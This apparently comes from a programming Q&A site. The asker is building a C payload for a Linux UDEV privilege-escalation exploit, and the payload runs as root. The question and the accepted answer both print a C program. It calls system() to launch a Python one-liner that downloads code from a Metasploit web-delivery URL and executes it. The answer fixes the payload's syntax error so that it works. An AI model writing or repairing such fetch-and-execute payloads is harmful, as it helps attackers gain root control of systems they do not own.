# How to stop URL from being commented out (C)

Tags: python, c, linux, string, url

I've been attempting a privilege escalation exploit on Linux, and it will run whatever file is at /tmp/run as the root user ([Linux kernel 2.6 UDEV exploit](https://www.exploit-db.com/exploits/8572/)). I've decided to make my payload in C (for an added challenge). It simply needs to execute a single python command (generated by Metasploit's web delivery module). The issue is, when I enter a URL as a string, the // in http:// will comment out the rest of the URL.

I don't know that much C whatsoever, so I have no idea how to fix this issue. This may seem a bit noob-ish, but I really can't find an answer anywhere.

Current code:

```
#include <stdio.h>

int main(void) {
    system("python -c \"import urllib2; r = urllib2.urlopen('http://0.0.0.0:8080/tmmPIejv70OV'); exec(r.read());\"" <== // in http:// comments out rest of line
    return 0;

}
```

Is there a proper way to fix this?

Comment: Escape both backslashes with another backslash (used for escaping characters. So you will get http:////

Comment: What makes you think that the `//` is commenting out the line?

Comment: Could it be the syntax highlighting of your text editor that is broken? Because that should not comment it out as it is inside a string.

Answer (score 4, accepted):

`//` does not make a comment inside of a string literal. The use of `//` in the string is not the problem you posted, instead, you should finish the `system` function call with closing `)`.

```
#include <stdio.h>

int main(void) {
    system("python -c \"import urllib2; r = urllib2.urlopen('http://0.0.0.0:8080/tmmPIejv70OV'); exec(r.read());\"");
    return 0;
}
```

Comment: Thank you. As stupid as this makes me feel, thank you.